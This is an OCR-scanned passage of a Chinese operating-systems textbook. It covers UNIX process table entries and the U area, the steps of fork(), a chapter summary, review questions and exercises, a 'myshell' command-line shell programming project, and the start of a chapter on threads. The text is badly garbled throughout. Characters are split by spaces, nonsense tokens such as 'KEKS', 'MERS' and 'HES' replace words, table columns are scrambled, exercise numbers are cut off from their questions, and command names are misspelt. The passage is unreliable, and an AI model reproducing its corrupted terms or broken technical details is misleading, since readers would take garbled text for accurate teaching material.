U (用户 ) 区 含有 进程 控制 信息 ， 这 些 信息 只 需要 在 该 进程 的 上 下 文 环境 中 存 取 
KEKS 定义 了 从 虚 地 址 到 物理 地 址 的 映射 , 还 包含 一 个 权限 域 , 用 于 指明 进程 允许 的 

访问 类 型 : 只 读 、 读 写 或 读 -执行 

内 核 栈 当 进程 在 内 核 态 下 执行 时 ， 它 含有 内 核 过 程 的 栈 帧 


用 户 级 上 下 文 包括 用 户 程 序 的 基本 成 分 , 可 以 由 已 编译 的 目标 文件 直接 产生 。 用 户 程 序 被 分 
成 正文 和 数据 两 个 区 域 , 正文 区 是 只 读 的 , 用 于 保存 程序 指令 。 当 进程 正在 执行 时 ,处 理 器 使 用 
用 户 栈 进行 过 程 调用 和 返回 以 及 参数 传递 。 共享 内 存 区 是 与 其 他 进程 共享 的 数据 区 域 , 它 只 有 一 
个 物理 副本 , 但 是 通过 使 用 虚拟 内 存 ,， 对 每 个 共享 进程 来 说 , 共享 内 存 区 看 上 去 好 像 在 它们 各 自 
的 地 址 空间 中 一 样 。 当 进程 没有 运行 时 ， 处 理 器 状态 信息 保存 在 寄存 器 上 下 文中 。 

系统 级 上 下 文 包含 操作 系统 管理 进程 所 需要 的 其 余 信 息 , 它 由 静态 部 分 和 动态 部 分 组 成 , 静 
态 部 分 的 大 小 是 固定 的 , 贯穿 于 进程 的 生命 周期 ; 动态 部 分 在 进程 的 生命 周期 中 大 小 可 变 。 静态 
部 分 的 一 个 成 分 是 进程 表 项 , 这 实际 上 是 由 操作 系统 维护 的 进程 表 的 一 部 分 , 每 个 进程 对 应 于 表 
中 的 一 项 。 进程 表 项 包含 对 内 核 来 说 总 是 可 以 访问 到 的 进程 控制 信息 。 因 此, 在 虚拟 内 存 系 统 中 ， 
所 有 的 进程 表 项 都 在 内 存 中 ， 表 3.11 中 列 出 了 进程 表 项 的 内 容 。 用 户 区 ， 即 U 区， 包含 内 核 在 
进程 的 上 下 文 环境 中 执行 时 所 需要 的 额外 的 进程 控制 信息 ， 当 进程 调 人 或 调 出 内 存 时 也 会 用 到 
它 。 表 3.12 给 出 了 这 个 表 的 内 容 。 





表 3.11 UNIX 进程 表 项 

















项 B 说 aR 

进程 状态 进程 的 当前 状态 

指针 指向 U 区 和 进程 内 存 区 ( 文本、 数据 和 栈 ) 

进程 大 小 使 操作 系统 知道 给 进程 分 配 多 少 空间 
RAP ID 标识 负责 正在 运行 的 进程 的 用 户 ; 有 效用 户 ID 标识 可 被 进程 使 用 ， 

用 户 标识 符 以 获得 与 特定 程序 相关 的 临时 特权 ， 当 该 程序 作为 进程 的 一 部 分 执行 时 ,进程 以 
有 效用 户 ID 的 权限 进行 操作 

、 __ 、 该 进程 的 ID 和 父 进程 的 ID. 这 一 项 是 在 系统 调用 fork 期 间 ， 当 进程 进入 新 建 

进程 标识 符 态 时 设置 的 

事件 描述 符 当 进 程 处 于 睡眠 态 时 有 效 。 当 事件 发 生 时 ， 该 进程 转换 到 就 绪 态 

优先 级 用 于 进程 调度 
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〈 续 ) 
项 g 说 阴 
信号 列举 发 送 到 进程 但 还 没有 处 理 的 信和 号 
定时 器 包括 进程 执行 时 间 、 内 核资 源 使 用 和 用 户 设置 的 用 于 给 进程 发 送 警告 信号 的 计 
时 器 
p link 指向 就 绪 队 列 中 的 下 一 个 链接 ( 进程 就 绪 时 有 效 ) 
MERS 指明 进程 映像 是 在 内 存 中 还 是 已 被 换 出 。 如 果 在 内 存 中 ,该 域 还 指出 它 是 否 可 
能 被 换 出 ， 或 者 是 临时 锁定 在 内 存 中 
表 3.12 UNIX 的 U 区 
项 目 说 有 明 
进程 表 指针 指明 对 应 于 U 区 的 表 项 
用 户 标识 符 实用 户 ID 和 有 效用 户 ID， 用 于 确定 用 户 的 权限 
定时 器 记录 进程 ( 以 及 它 的 后 代 ) 在 用 户 态 下 执行 的 时 间 和 在 内 核 态 下 执行 的 时 间 
N 对 系统 中 定义 的 每 类 信号 , 指出 进程 收 到 信号 后 将 做 出 什么 反应 ( 退出、 忽略、 
信号 处 理 程序 数组 执行 特定 的 用 户 函数 ) 
控制 终端 如 果 有 该 进程 的 登录 终端 时 ， 则 指明 它 
错误 域 记录 在 系统 调用 时 过 到 的 错误 
返回 值 包含 系统 调用 的 结果 
uos% 描述 传送 的 数据 量 、 源 ( 或 目标 ) 数据 数组 在 用 户 空间 中 的 地 址 和 用 于 1O 的 
文件 偏 移 量 
文件 参数 描述 进程 的 文件 系统 环境 的 当前 目录 和 当前 根 
用 户 文件 描述 符 表 记录 进程 已 打开 的 文件 
限度 域 限制 进程 的 大 小 和 可 以 写 人 的 文件 大 小 
容许 模式 域 屏蔽 在 由 进程 创建 的 文件 中 设置 的 模式 


进程 表 项 和 U 区 的 区 别 反映 出 UNIX 内 核 总 是 在 某 些 进程 的 上 下 文 环 境 中 执行 ， 大 多 数 时 
候 ， 内 核 都 在 处 理 与 该 进程 相关 的 部 分 , 但 是 ， 某 些 时 候 ， 如 当 内 核 正在 执行 一 个 调度 算法 ， 准 
备 分 派 另 一 个 进程 时 , 它 需 要 访问 其 他 进程 的 相关 信息 。 当 给 定 进程 不 是 当前 进程 时 , 可 以 访问 
进程 控制 表 中 的 信息 。 

系统 级 上 下 文静 态 部 分 的 第 三 项 是 本 进程 区 表 , 它 由 内 存 管理 系统 使 用 。 最 后 ,内 核 栈 是 系 
统 级 上 下 文 环 境 的 动态 部 分 , 当 进程 正在 内 核 态 下 执行 时 需要 使 用 这 个 栈 , 它 包含 当 发 生 过 程 调 
用 或 中 断 时 必须 保存 和 恢复 的 信息 。 


3.7.3 ”进程 控制 


UNIX 中 的 进程 创建 是 通过 内 核 系统 调用 fork() 实 现 的 。 当 一 个 进程 产生 一 个 fork 请 求 时 ， 
操作 系统 执行 以 下 功能 [ BACH86 ]: 

1 ) 为 新 进程 在 进程 表 中 分 配 一 个 空 项 。 

2) 为 子 进程 赋 一 个 唯一 的 进程 标识 符 。 

3 ) 做 一 个 父 进程 上 下 文 的 逻辑 副本 ， 不 包括 共享 内 存 区 。 

4) 增加 父 进 程 拥有 的 所 有 文件 的 计数 器 ， 以 表示 有 一 个 另外 的 进程 现在 也 拥有 这 些 文件 。 

5 ) 把 子 进程 置 为 就 绪 态 。 

6) 向 父 进程 返回 子 进程 的 进程 号 ; 对 子 进程 返回 零 。 

所 有 这 些 操作 都 在 父 进程 的 内 核 态 下 完成 。 为 当 内 核 完 成 这 些 功 能 后 可 以 继续 下 面 三 种 操作 
之 一 ， 它 们 可 以 认为 是 分 派 器 例 程 的 一 个 部 分 : 
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@ 在 父 进 程 中 继续 执行 。 控 制 返回 用 户 态 下 父 进程 进行 fork 调用 处 。 
o 处 理 器 控制 权 交 给 子 进程 。 子 进程 开始 执行 代码 , 执行 点 与 父 进 程 相同 , 也 就 是 说 在 fork 
调用 的 返回 处 。 
@ 控制 转交 给 另 一 个 进程 。 父 进程 和 子 进程 都 置 于 就 绪 状 态 。 
很 难 想象 这 种 创建 进程 的 方法 中 父 进程 和 子 进程 都 执行 相同 的 代码 。 其 区 别 在 于 : 当 从 fork 
中 返回 时 , 测试 返回 参数 , 如 果 值 为 零 , 则 它 是 子 进程 , 可 以 转移 到 相应 的 用 户 程序 中 继续 执行 ， 
如 果 值 不 为 零 ， 则 它 是 父 进程 ， 继 续 执行 主 程序 。 


3.8 小结 


现代 操作 系统 中 最 基本 的 构件 是 进程 ,操作 系统 的 基本 功能 是 创建 、 管 理 和 终止 进程 。 当 进 
程 处 于 活跃 状态 时 ,操作 系统 必须 设法 使 每 个 进程 都 分 配 到 处 理 器 执行 时 间 , 并 协调 它们 的 活动 、 
管理 有 冲突 的 请 求 、 给 进程 分 配 系统 资源 。 

为 执行 进程 管理 功能 , 操作 系统 维护 着 对 每 个 进程 的 描述 , 或 者 称 为 进程 映像 , 它 包括 执行 
进程 的 地 址 空间 和 一 个 进程 控制 块 。 进 程控 制 块 含有 操作 系统 管理 进程 所 需要 的 所 有 信息 , 包括 
它 的 当前 状态 、 分 配给 它 的 资源 、 优 先 级 和 其 他 相关 数据 。 

在 整个 生命 周期 中 , 进程 总 是 在 一 些 状态 之 间 转 换 。 最 重要 的 状态 有 就 绪 态 、 运 行 态 和 阻塞 
态 。 一 个 就 绪 态 进程 是 指 当前 没有 执行 但 已 做 好 了 执行 准备 的 进程 ,只 要 操作 系统 调度 到 它 就 立 
即 可 以 执行 ; 运行 态 进程 是 指 当前 正在 被 处 理 器 执行 的 进程 , 在 多 处 理 器 系统 中 , 会 有 多 个 进程 
处 于 这 种 状态 ; 阻塞 态 进程 正在 等 待 某 一 事件 的 完成 ， 如 一 次 IO 操作 。 

一 个 正在 运行 的 进程 可 被 一 个 在 进程 外 发 生 且 被 处 理 器 识别 的 中 断 事 件 打 断 ,或 者 被 执行 操 
作 系统 的 系统 调用 打 断 。 不 论 哪 种 情况 , 处理 器 都 执行 一 次 模式 切换 ,把 控制 转交 给 操作 系统 例 
程 。 操 作 系 统 在 完成 必需 的 操作 后 ， 可 以 恢复 被 中 断 的 进程 或 者 切换 到 别 的 进程 。 


3.9 推荐 读物 


关于 UNIX 进程 管理 的 详细 描述 请 参阅 [ GOOD94 ] 和 [ GRAY97 ]。[ NEHM75 ] 中 有 关于 进程 状态 的 
讨论 以 及 分 派 所 需要 的 操作 系统 原 语 。 

GOOD94 Goodheart, B., and Cox, J. The Magic Garden Explained: The Internals of UNIX System V Release 
4. Englewood Cliffs, NJ: Prentice Hall, 1994. 

GRAY97 Gray, J. Interprocess Communications in UNIX: The Nooks and Crannies. Upper Saddle River, NJ: 
Prentice Hall, 1997. 

NEHM7S Nehmer, J. “Dispatcher Primitives for the Construction of Operation System Kernels” Acta 
Informatica, vol. 5, 1975, 


3.10 ”关键 术语 、 复 习题 和 习题 


关键 术语 
阻塞 态 父 进程 进程 切换 交换 
子 进程 抢占 程序 状态 字 系统 态 
退出 态 特权 态 就 绪 态 任务 
中 断 进程 轮转 跟踪 
内 核 态 进程 控制 块 运行 态 陷阱 
模式 切换 进程 映像 HES 用 户 态 


新 建 态 
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复习 题 

3.1 什么 是 指令 跟踪 ? 

3.2 通常 有 哪些 事件 会 导致 创建 一 个 进程 ? 

3.3 对 于 图 3.6 中 的 进程 模型 ， 请 简单 定义 每 个 状态 。 

3.4 抢占 一 个 进程 是 什么 意思 ? 

3.5 什么 是 交换 ， 其 目的 是 什么 ? 

3.6 ”为 什么 图 3.9b 中 有 两 个 阻塞 态 ? 

3.7 列 出 挂 起 进程 的 4 个 特点 。 

3.8 ”对 于 哪 类 实体 ， 操 作 系统 为 了 管理 它 而 维护 其 信息 表 ? 

3.9 ” 列 出 进程 控制 块 中 的 三 类 信息 。 

3.10 ”为 什么 需要 两 种 模式 (用 户 态 和 内 核 态 7 

3.11 操作 系统 创建 一 个 新 进程 所 执行 的 步骤 是 什么 ? 

3.12 中断 和 陷阱 有 什么 区 别 ? 

3.13” 举 出 中 断 的 三 个 例子 。 

3.14 ”模式 切换 和 进程 切换 有 什么 区 别 ? 

习题 

3.1 给 出 操作 系统 进行 进程 管理 时 的 5 种 主要 活动 ， 并 简单 描述 为 什么 需要 它们 。 

3.2 ”假设 一 个 计算 机 有 A 个 输入 输出 设备 和 BO 个 处 理 器 ， 在 任何 时 候 内 存 最 多 容纳 C 个 进程 。 假 设 
A<B<C， 试 问 : 

a) 任 一 时 刻 ， 处 于 就 绪 态 、 运 行 态 、 阻 塞 态 、 就 绪 挂 起 态 、 阻 塞 挂 起 态 的 最 大 进程 数目 各 是 多 少 ? 
b) 处 在 就 绪 态 、 运 行 态 、 阻 塞 态 、 就 绪 挂 起 态 、 阻 塞 挂 起 态 的 最 小 进程 数目 各 是 多 少 ? 

3.3 ”图 3.9b 包含 7 个 状态 。 假 设 我 们 让 系统 有 两 个 就 绪 状 态 : 一 般 就 绪 状 态 READY 和 SYSTEM READY 
状态 。 系 统 当 中 处 于 SYSTEM READY 状态 的 进程 拥有 最 高 优先 级 , 并且 按 轮转 方式 执行 ，CPU 调度 
算法 让 处 于 这 种 状态 的 进程 拥有 特权 并 且 它 们 从 不 被 交换 出 内 存 。 请 画 出 对 应 的 状态 转换 图 ， 标 识 出 
每 一 个 状态 转换 。 

3.4 假设 我 们 是 一 个 操作 系统 的 开发 人 员 , 该 操作 系统 采用 五 状态 进程 模型 ( 如 图 3.5 BR). 在 该 操作 系 
统 中 ， 所 有 进程 按照 轮转 方式 执行 。 再 假设 我 们 正在 为 运行 VO 密集 型 任务 的 计算 机 开发 新 的 操作 系 
统 。 为 了 保证 这 些 任 务 在 需要 时 ( 即 当 一 个 突 发 VO 完成 时 ) 能 快速 获得 处 理 器 ， 我 们 在 进程 模型 中 
考虑 两 个 READY 状态 : READY-CPU 状态 ( 为 CPU 密集 型 进程 Al READY-I/O 状态 (为 VO 密集 
型 进程 )。 系统 中 处 于 READY- IO 状态 的 进程 拥有 最 高 权限 访问 CPU, 并 且 以 FCFS 方式 执行 。 处 于 
READY-CPU 状态 的 进程 以 轮转 方式 执行 。 当 进程 进入 系统 时 ,它们 被 分 类 为 CPU 密集 型 或 者 OF 
Aw, 

a) 讨论 用 如 上 所 描述 的 两 种 就 绪 状 态 实现 操作 系统 的 优点 和 缺点 。 
b) 讨论 如 何 通过 五 状态 进程 模型 并 修改 进程 调度 算法 来 获得 六 状态 进程 模型 的 好 处 。 

3.5 对 于 图 3.9b 中 给 出 的 7 状态 进程 模型 ， 请 仿照 图 3.8b 画 出 它 的 排队 图 。 

3.6 考虑 图 3.9b 中 的 状态 转换 图 。 假 设 操作 系统 正在 分 派 进程 ， 有 进程 处 于 就 绪 态 和 就 绪 / 挂 起 态 ， 并 且 
至 少 有 一 个 处 于 就 绪 / 挂 起 态 的 进程 比 处 于 就 绪 态 的 所 有 进程 的 优先 级 都 高 。 有 两 种 极端 的 策略 : 1) 
总 是 分 派 一 个 处 于 就 绪 状 态 的 进程 ， 以 减少 交换 ; 2) 总 是 把 机 会 给 具有 最 高 优先 级 的 进程 ， 即 使 会 
导致 在 不 需要 交换 时 进行 交换 。 请 给 出 一 种 能 均衡 考虑 优先 级 和 性 能 的 中 间 策 略 。 

3.7 表 3.9 展示 了 UNIX SVR4 操作 系统 的 9 个 进程 状态 。 

a) 列 出 表 3.9 中 的 9 个 状态 并 且 指 出 这 9 个 状态 与 图 3.9b 中 7 个 状态 之 间 的 关系 。 
b) 给 出 UNIX SVR4 操作 系统 中 存在 两 个 运行 状态 的 理由 。 

3.8 VAX/VMS 操作 系统 采用 了 四 种 处 理 器 访问 模式 ， 以 促进 系统 资源 在 进程 间 的 保护 和 共享 。 访 问 模 式 

确定 : 
O 指令 执行 特权 : 处 理 器 将 执行 什么 指令 。 
© 内 存 访问 特权 : 当前 指令 可 能 访问 虚拟 内 存 中 的 哪个 单元 。 


704 RoR 4. # 


3.9 


3.10 图 3.8b 表明 一 个 进程 每 次 只 能 在 一 个 事件 队列 中 。 


3.11 


4 种 模式 如 下 : 
@ 内 核 模式 : 执行 VMS 操作 系统 的 内 核 ， 包 括 内 存 管理 、 中 断 处 理 和 1/O 操作 。 
@ 执行 模式 : 执行 许多 操作 系统 服务 调用 ， 包 括 文件 〈 磁盘 和 磁带 ) 和 记录 管理 例 程 。 
@ 管理 模式 : 执行 其 他 操作 系统 服务 ， 如 响应 用 户 命令 。 
@ 用 户 模式 : 执行 用 户 程 序 和 诸如 编译 器 、 编 辑 器 、 链 接 程序 、 调 试 器 之 类 的 实用 程序 。 
在 较 少 特权 模式 执行 的 进程 通常 需要 调用 在 较 多 特权 模式 下 执行 的 过 程 ， 例如, 一 个 用 户 程 序 需 
要 一 个 操作 系统 服务 。 这 个 调用 通过 使 用 一 个 改变 模式 ( 简称 CHM) 指令 来 实现 ， 该 指令 将 引发 一 
个 中 断 ， 把 控制 转交 给 处 于 新 的 访问 模式 下 的 例 程 ， 并 通过 执行 REI (Return from Exception or 
Interrupt， 从 异常 或 中 断 中 返回 ) 指令 返回 。 
a) 很 多 操作 系统 有 两 种 模式 ， 内 核 态 和 用 户 态 ， 那 么 提供 4 种 模式 有 什么 优点 和 缺点 ? 
b) 你 可 以 举 出 一 种 有 4 种 以 上 模式 的 情况 吗 ? 


表 3.13 VAX/VMS 的 进程 状态 


进程 状态 说 AA 
当前 正在 执行 运行 进程 
可 计算 〈 驻 留 ) 就 绪 并 驻 留 在 内 存 中 
可 计算 〈 换 出 ) 就 绪 但 换 出 内 存 
页 面 失效 等 待 进程 引用 了 不 在 内 存 中 的 页 ， 必 须 等 待 读 人 该 页 
页 冲突 等 待 程序 引用 了 另 一 个 正 处 于 页 面 失效 等 待 的 进程 所 等 待 的 共享 页 ， 或 者 引用 了 进 
程 止 在 读 人 或 写 出 的 私有 页 
一 般 事 件 等 待 等 待 共享 事件 标志 《〈 事件 标志 是 单位 进程 间 的 信号 机 制 ) 
自由 页 等 待 等 待 内 存 中 的 一 个 自由 页 被 加 入 到 用 于 该 进程 的 页 集合 中 进程 的 工作 页 面 组 ) 
KREE (EA) 进程 把 自己 置 子 等 待 状态 
休眠 等待 ( 换 出 ) 休眠 进程 被 换 出 内 存 
本 地 事件 等 待 ( 驻 留 ) 进程 在 内 存 中 ， 并 正在 等 待 局 部 事件 标志 ( 通常 是 VO 完成 ) 
本 地 事件 等 待 ( 换 出 ) 处 于 本 地 事件 等 待 状态 的 进程 被 换 出 内 存 
HESH (HM) 进程 被 另 一 个 进程 置 于 等 待 状态 
挂 起 等 待 ( 换 出 ) 挂 起 进程 被 换 出 内 存 
资源 等 待 进程 正在 等 待 各 种 系统 资源 


在 前 面 的 问题 中 讨论 的 VMS 方案 常常 称 做 环 状 保护 结构 ， 如 图 3.18 所 示 。3.3 节 所 描述 的 简单 的 内 
核 /用 户 方案 是 一 种 两 环 结构 ，[ SILB04 ] 指出 了 这 种 方法 的 问题 : 

环 状 ( 层次 ) 结构 的 主要 缺点 是 它 不 允许 我 们 实 
施 须知 原理 , 特别 地 , 如 果 一 个 对 象 必须 在 域 D 中 可 
访问 ， 但 在 域 D; 中 不 可 访问 ， 则 必须 有 j<i。 这 意 昧 
着 在 D 中 可 访问 的 每 个 县 在 Dj 中 都 可 以 访问 。 
a) 请 清楚 地 解释 上 面 引文 中 提出 的 问题 。 
b) 请 给 出 环 状 结构 操作 系统 解决 这 个 问题 的 一 种 方 
法 。 


a) 是 否 能 够 允许 进程 同时 等 待 一 个 或 多 个 事件 ? 
请 举例 说 明 。 

b) 在 这 种 情况 下 ， 如 何 修改 图 中 的 排队 结构 以 支持 
这 个 新 特点 ? 

所 有 现代 操作 系统 都 有 系统 中 断 。 

a) 请 解释 中 断 如 何 支 持 多 道 程序 设计 。 

b) 请 解释 中 断 如 何 支持 错误 处 理 。 





图 3.18 VAX/VMS 的 访问 模式 
c) 对 于 单线 程 进程 ， 举 例 说 明 一 个 能 够 引起 中 断 并 且 导 致 进程 切换 的 情景 。 另 外 请 举例 说 明 能 够 引 
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起 中 断 但 是 没有 进程 切换 的 情景 。 


3.12 如 3.7 WEE, Æ UNIX 中 进程 是 通过 fork() 系 统 调用 创建 的 。 在 处 理 fork0 请 求 的 过 程 中 ， 操 作 系 


统 把 子 进程 的 ID 返回 给 父 进 程 。 换 言 之 ，fork0 系 统 调用 创建 了 一 个 包含 父子 进程 的 进程 树 ， 其 中 
父 进程 指向 子 进 程 。 画 出 由 下 面 三 个 连续 的 fork() 系 统 调 用 产生 的 进程 树 : 

fork(); //A 

fork(); //B 

fork(); //C 

用 合适 的 forkO 语 句 标 出 每 个 被 创建 的 进程 。 


编程 项 目 1: 开发 一 个 shell 程序 


shell 或 者 命令 行 解释 器 是 操作 系统 中 最 基本 的 用 户 接口 。 第 一 个 项 目 是 写 一 个 简单 的 shell 程序 一 一 


myshel1， 它 具有 以 下 属性 : 


1. 


这 个 shell 程序 必须 支持 以 下 内 部 命令 : 

a) cd <directozry> 一 一 把 当前 默认 目录 改变 为 <dizecetory>。 如 果 没 有 <directory> 参 数 ， 则 显 
示 当 前 目录 。 如 果 该 目录 不 存在 ， 会 出 现 合适 的 错误 信息 。 这 个 命令 也 可 以 改变 PWD 环境 变量 。 

b) clr 一 一 清 屏 。 

c) dir <directory> 一 一 列 出 目录 <directory> 的 内 容 ， 

d) environ 一 一 列 出 所 有 的 环境 变量 。 

e) echo <comment> 一 一 在 屏幕 上 显示 <comment> 并 换行 ( 多 个 空格 和 制 表 符 可 能 被 缩减 为 一 个 空 
格 )。 

f) help 一 一 显示 用 户 手 册 ， 并 且 使 用 more 命令 过 滤 。 

g) pauge 一 一 停止 shell 操作 直到 按 下 回 车 键 。 

h ) quit 一 一 退出 shell。 

i) shell 的 环境 变量 应 该 包含 shell=<pathname>/myshell, H'<pathname>/myshell 是 可 执行 
程序 shell 的 完整 路 径 ( 不 是 你 的 目录 下 的 硬 连 线路 径 ， 而 是 它 执行 的 路 径 )。 


. 其 他 的 命令 行 输入 被 解释 为 程序 调用 ，shell 创建 并 执行 这 个 程序 ， 并 作为 自己 的 子 进程 。 程 序 的 执行 


的 环境 变量 包含 一 下 条 目 : 
parent=<pathname>/myshell, 其 中 <pathname>/myshell 已 经 在 1.ix. 中 讲述 过 。 


.shell 必须 能 够 从 文件 中 提取 命令 行 输入 ， 例 如 shell 使 用 以 下 命令 行 被 调用 : 


myshell batchfile 
这 个 批 处 理 文 件 应 该 包含 一 组 命令 集 ， 当 到 达 文 件 结尾 时 shell 退出 。 很 明显 ， 如 果 shell 被 调用 时 
没有 使 用 参数 ， 它 会 在 屏幕 上 显示 提示 符 请 求 用 户 输入 . 





4. shell 必须 支持 i/o 重 定向 ，stdin 和 stdout, 或 者 其 中 之 一 ,例如 命令 行为 : 
programname argl arg2<inputfile>outputfile 
使 用 arg1 和 arg2 执行 程序 programname， 输 入 文件 流 被 替换 为 tnputEfile， 输 出 文件 流 被 
替换 为 outputfile。 
stdout 重 定向 应 该 支持 以 下 内 部 命令 : dir, environ, echo, & helpo 
使 用 输出 重 定向 时 ， 如 果 重 定向 字符 是 >， 则 创建 输出 文件 ， 如 果 存 在 则 覆盖 之 ; 如 果 重 定 向 字符 
为 >>， 也 会 创建 输出 文件 ， 如 果 存 在 则 添加 到 文件 尾 。 
5. shel 必须 支持 后 台 程 序 执行 。 如 果 在 命令 行 后 添加 && 字 符 ， 在 加 载 完 程序 后 需要 立刻 返回 命令 行 提示 符 。 
6. 命令 行 提示 符 必须 包含 当前 路 径 。 
提示 : 你 可 以 假定 所 有 命令 行 参数 包括 重 定向 字符 <、>、>> 和 后 台 执 行 字符 &) 和 其 他 命令 行 
参数 用 空白 空间 分 开 ， 空 白 空间 可 以 为 一 个 或 多 个 空格 或 制 表 符 ( 见 上 面 4 中 的 命令 行 )。 
项 目 要 求 


l. 


设计 一 个 简单 的 命令 行 shell， 满 足 上 面 的 要 求 并 且 在 指定 的 UNIX 平台 上 执行 。 


2. 写 一 个 关于 如 何 使 用 shell 的 简单 的 用 户 手 册 ， 用 户 手 册 应 该 包含 足够 的 细节 以 方便 UNIX 初学 者 使 用 。 


例如 ， 你 应 该 解释 LO 重 定 向 、 程 序 环境 和 后 台 程 序 执行 。 用 户 手册 必须 命名 为 readme， 必 须 是 一 个 
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标准 文本 编辑 器 可 以 打开 的 简单 文本 文档 。 
举 一 个 描述 的 类 型 和 深度 的 例子 , 你 应 该 看 一 下 cesh A tesh 的 在 线 帮助 (man cesh, man tcsh )。 
这 两 个 shell 显然 比 你 的 shell 有 更 多 的 功能 ,你 的 用 户 手 册 没 必要 做 这 么 大 。 不 要 包括 编译 指示 一 文件 
列表 或 源码 ， 我 们 可 以 从 你 提交 的 其 他 文件 中 找 出 来 。 这 应 该 是 操作 员 手 册 而 非 程序 员 手 册 。 
3. 源码 必须 有 很 详细 的 注释 , 并且 有 很 好 的 组 织 结构 以 方便 别人 阅读 和 维护 。 结构 和 注释 好 的 程序 更 加 易 
于 理解 ， 并 且 可 以 保证 批改 你 作业 的 人 不 用 很 费劲 地 去 读 你 的 代码 。 
4. 在 截止 期 之 前 ， 要 提供 很 详细 的 提交 过 程 。 
5. 提交 内 容 为 源码 文件 ， 包 括 文件 、makefile (全 部 小 写 ) 和 readme ( 全 部 小 写 ) 文件 。 批 改作 业者 
会 重新 编译 源码 ， 如 果 编 译 不 通过 将 没 办 法 打分 。 
6. makefile (全 部 小 写 ) 必须 产生 二 进 制 文 件 myshe11l ( 全 部 小 写 )。 一 个 makefile 的 例子 如 下 : 
# Joe Citizen, 81234567 - Operating Systems Project 1 
# CompLab1/01 tutor:Fred Bloggs 
myshell:myshell.c utility.c myshell.h 
gcc -Wall myshell.c utility.c -o myshell 
在 命令 提示 符 下 键入 make 就 会 产生 myshell 程序 。 
提示 : 上 面 makefile 的 第 4 行 必须 以 制 表 符 开 始 。 
7. 根据 上 面 提供 的 实例 ， 提 交 的 目录 应 该 包含 以 下 文件 : 
makefile 
myshell.c 
utility.c 
myshell.h 
readme 


提交 

需要 makefile 文件 ,所 有 提交 的 文件 将 会 被 复制 到 一 个 目录 下 ,所 以 不 要 在 makefile 中 包含 路 径 。 
makefile 中 应 该 包含 编译 程序 所 需 的 依赖 关系 , MRA TEX, makefile 也 会 编译 这 个 库 文件 的 。 

为 了 清楚 起 见 ， 再 重复 一 次 : 不 要 提交 二 进 制 或 者 目标 代码 文件 。 所 需 的 只 是 源码 、makefile 和 
readme 文件 。 提 交 之 前 测试 一 下 ， 把 源码 复制 到 一 个 空 目 录 下 ， 键 和 人 make 命令 编译 。 

我 们 将 使 用 一 个 shel 脚本 把 你 的 文件 复制 到 测试 目录 下 ， 删 除 已 经 存在 的 myshell、*.a 或 *.o 文 
IF, HIT make 命令 , 复制 一 组 测试 文件 到 测试 目录 下 ， 然 后 用 一 个 标准 的 测试 脚本 通过 stdin 和 命令 行 参 
数 测试 你 的 shell 程序 。 如 果 这 个 过 程 因 为 名 字 错 误 、 名 字 大 小 写 错误 、 源 码 版 本 错误 导致 不 能 编译 和 文件 


不 存在 错误 等 而 停止 的 话 ， 那 么 打分 过 程 也 会 停止 。 在 这 种 情况 下 ， 所 得 的 分 数 将 基于 已 经 完成 的 测试 部 
分 ， 还 有 源码 和 用 户 手册 。 


所 需 的 文档 


首先 ， 源 码 和 用 户 手册 都 将 被 评估 和 打分 ， 源 码 需要 注释 ， 用 户 手 册 可 以 是 你 自己 选择 的 形式 〈 但 要 
能 被 简单 文本 编辑 器 打开 )。 其 次 ,手册 应 该 包含 足够 的 细节 以 方便 UNIX 初学 者 使 用 , 例如， 你 应 该 解释 
WO 重 定向 、 程 序 环 境 和 后 台 程 序 执行 。 用 户 手 册 必 须 命名 为 readme 全 部 小 写 ， 没 有 .txt 后 缀 )。 


第 4 章 线程、 对 称 多 处 理 ( SMP ) 和 微 内 核 


本 章 讲述 一 些 与 进程 管理 相关 的 更 高 级 的 概念 ， 这 些 概 念 在 很 多 当代 操作 系统 中 都 可 以 找 
到 。 首先 , 这 里 所 说 的 进程 概念 要 比 前 面 给 出 的 更 复杂 和 精细 。 KRE, 它 包 含 了 两 个 独立 的 概 
D: 一 个 与 资源 所 有 权 有 关 , 一 个 与 执行 相关 。 这 个 区 别 导致 在 许多 操作 系统 中 出 现 并 发 展 了 称 
为 线程 的 结构 。 在 分 析 线 程 之 后 ， 接 下 来 是 对 称 多 处 理 〈《SMP ) 在 对 称 多 处 理 的 情况 下 ， RER 
统 必 须 能 够 同时 在 多 个 处 理 器 上 调度 不 同 的 进程 。 最 后 介绍 微 内 核 的 概念 , 它 是 构造 操作 系统 以 
支持 进程 管理 及 其 相关 任务 的 一 种 有 效 方法 。 


4.1 进程 和 线程 


到 目前 为 止 提出 的 进程 的 概念 包含 两 个 特点 : 
@ 资源 所 有 权 : 一 个 进程 包括 一 个 存放 进程 映像 的 虚拟 地 址 空间 ; 回顾 第 3 章 中 提 到 的 内 
容 ， 进 程 映 像 是 程序 、 数 据 、 栈 和 进程 控制 块 中 定义 的 属性 的 集合 。 一 个 进程 总 是 拥有 
对 资源 的 控制 或 所 有 权 ， 这 些 资源 包括 内 存 、LO 通道 、UO 设备 和 文件 。 操 作 系 统 执行 
保护 功能 ， 以 防止 进程 之 间 发 生 不 必要 的 与 资源 相关 的 冲突 。 
o 调度 /执行 : 一 个 进程 沿 着 通过 一 个 或 多 个 程序 的 一 条 执行 路 径 (轨迹 ) 执行 (如 图 1.5 和 
图 1.26 所 示 )。 其 执行 过 程 可 能 与 其 他 进程 的 执行 过 程 交替 进行 。 因 此 ,一 个 进程 具有 
一 个 执行 状态 GEA. RAS) 和 一 个 分 配 的 优先 级 ， 并 且 是 一 个 可 被 操作 系统 调度 和 
分 派 的 实体 。 i 
既然 上 述 两 个 特点 是 独立 的 , 那么 操作 系统 应 该 能 够 独立 地 处 理 它们 。 很 多 操作 系统 , 特别 
是 近期 开发 的 操作 系统 已 经 这 样 做 了 。 为 区 分 这 两 个 特点 , 分 派 的 单位 通常 称 做 线程 或 轻 量 级 进 
程 (Light Weight Process，LWP )， 而 拥有 资源 所 有 权 的 单位 通常 仍 称 做 进程 或 任务 。 


4.1.1 多 线程 


多 线程 是 指 操作 系统 在 单个 进程 内 支持 多 个 并 发 执行 路 径 的 能 力 。 每 个 进程 中 只 有 一 个 线程 在 
执行 的 传统 方法 (还 没有 明确 线程 的 概念 ) 称 为 单线 程 方法 。 图 4.1 左 半 部 分 展示 的 两 种 安排 都 是 
单线 程 方法 ，MS-DOS 是 一 个 支持 单 用 户 进程 和 单线 程 的 操作 系统 的 例子 。 其 他 操作 系统 ， 如 各 种 
版 本 的 UNIX， 支 持 多 用 户 进程 ， 但 只 支持 每 个 进程 一 个 线程 。 图 4.1 的 右 半 部 分 描述 了 多 线程 方 
